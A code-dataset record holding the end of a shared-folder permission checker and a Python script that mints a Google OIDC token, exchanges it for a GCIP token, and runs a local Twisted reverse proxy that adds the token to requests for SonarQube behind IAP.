    when only the group write bit is missing, otherwise None.
    """
    mode = path.stat().mode
    if not stat.S_ISDIR(mode):
        return
    if not (mode & stat.S_IXGRP):
        return 'PROB_DIR_NOT_ACCESSIBLE'
    if not (mode & stat.S_IWGRP):
        return 'PROB_DIR_NOT_WRITABLE'
# Registry of every strict shared-folder check, in the order they are applied.
ALLSCHECKS = (file_groupreadable, file_group_executable, dir_group_readable)
| 2.828125 | 3 |
sonarqube/iap_proxy.py | cognitedata/security-github-actions | 1 | 12761550 | #!/usr/bin/env python3
from sys import stderr
import os
import json
import requests
from urllib.parse import quote as urlquote
from google.oauth2.service_account import IDTokenCredentials
from google.oauth2 import id_token
from google.auth.transport.requests import Request
from twisted.internet import reactor, ssl
from twisted.web import proxy, server
from twisted.protocols.tls import TLSMemoryBIOFactory
from twisted.logger import globalLogBeginner, textFileLogObserver
globalLogBeginner.beginLoggingTo([textFileLogObserver(stderr)])
def get_oidc_token(request, client_id, service_account):
    """Mint a Google OIDC ID token for *client_id* from a service account.

    :param request: google.auth transport request used for the refresh call
    :param client_id: OAuth client ID used as the token audience
    :param service_account: service-account key material as a JSON string
    :return: the freshly issued OIDC ID token
    """
    credentials = IDTokenCredentials.from_service_account_info(
        json.loads(service_account), target_audience=client_id
    )
    credentials.refresh(request)
    return credentials.token
def exchange_google_id_token_for_gcip_id_token(api_key, google_open_id_connect_token):
    """Trade a Google-issued ID token for a GCIP ID token.

    Calls the Identity Toolkit ``signInWithIdp`` endpoint with the Google
    token as the IdP credential and returns the GCIP ``idToken``.
    """
    SIGN_IN_WITH_IDP_API = 'https://identitytoolkit.googleapis.com/v1/accounts:signInWithIdp'
    endpoint = SIGN_IN_WITH_IDP_API + '?key=' + api_key
    payload = {
        'requestUri': 'http://localhost',
        'returnSecureToken': True,
        'postBody': 'id_token=' + google_open_id_connect_token + '&providerId=google.com',
    }
    response = requests.post(endpoint, payload)
    return response.json()['idToken']
class IAPReverseProxyResource(proxy.ReverseProxyResource):
    """Reverse-proxy resource that injects an ID token as the
    ``Authorization: Bearer`` header on every proxied request.

    When ``custom_auth_header`` is configured, the caller's original
    Authorization header is preserved under that name before being
    overwritten with the token.
    """

    def proxyClientFactoryClass(self, *args, **kwargs):
        # Wrap the upstream client factory in TLS so the connection to the
        # target host is encrypted.
        return TLSMemoryBIOFactory(
            ssl.optionsForClientTLS(self.host),
            True,
            super().proxyClientFactoryClass(*args, **kwargs),
        )

    def __init__(self, id_token, custom_auth_header, target_uri, target_port, path=b""):
        super().__init__(target_uri, target_port, path)
        # Bearer token added to each proxied request.
        self.id_token = id_token
        # Optional header name that receives the caller's original auth.
        self.custom_auth_header = custom_auth_header

    def render(self, request):
        # Move the caller's own Authorization header to the custom header
        # (if configured) before replacing it with the injected token.
        if self.custom_auth_header and request.requestHeaders.hasHeader(b"authorization"):
            request.requestHeaders.setRawHeaders(
                self.custom_auth_header,
                request.requestHeaders.getRawHeaders(b"authorization", []),
            )
        request.requestHeaders.setRawHeaders(b"authorization", ['Bearer {}'.format(self.id_token)])
        return super().render(request)

    def getChild(self, path, request):
        # Propagate token and header config to child path segments,
        # URL-quoting each segment before appending it to the proxied path.
        return IAPReverseProxyResource(
            self.id_token,
            self.custom_auth_header,
            self.host,
            self.port,
            self.path + b"/" + urlquote(path, safe=b"").encode("utf-8"),
        )
# ---- Configuration from the environment --------------------------------
custom_auth_header = os.environ.get("IAP_CUSTOM_AUTH_HEADER")
target_host = os.environ["IAP_TARGET_HOST"]
# Bug fix: the guard previously tested "TARGET_PORT" while reading
# "IAP_TARGET_PORT", so a configured IAP_TARGET_PORT was silently ignored
# and the default 443 was always used.
target_port = (
    int(os.environ.get("IAP_TARGET_PORT")) if os.environ.get("IAP_TARGET_PORT") else 443
)
client_id = os.environ["IAP_CLIENT_ID"]
sa_data = os.environ["IAP_SA"]
api_key = os.environ["API_KEY"]

# Mint a Google OIDC token for the IAP client, then exchange it for a GCIP
# ID token accepted by the proxied backend.
# NOTE(review): this variable shadows the `id_token` module imported above;
# harmless here since the module is not used afterwards.
open_id_connect_token = get_oidc_token(Request(), client_id, sa_data)
id_token = exchange_google_id_token_for_gcip_id_token(api_key, open_id_connect_token)

# Serve the authenticating reverse proxy on localhost:9000.
site = server.Site(
    IAPReverseProxyResource(id_token, custom_auth_header, target_host, target_port)
)
reactor.listenTCP(9000, site, interface="127.0.0.1")
reactor.run()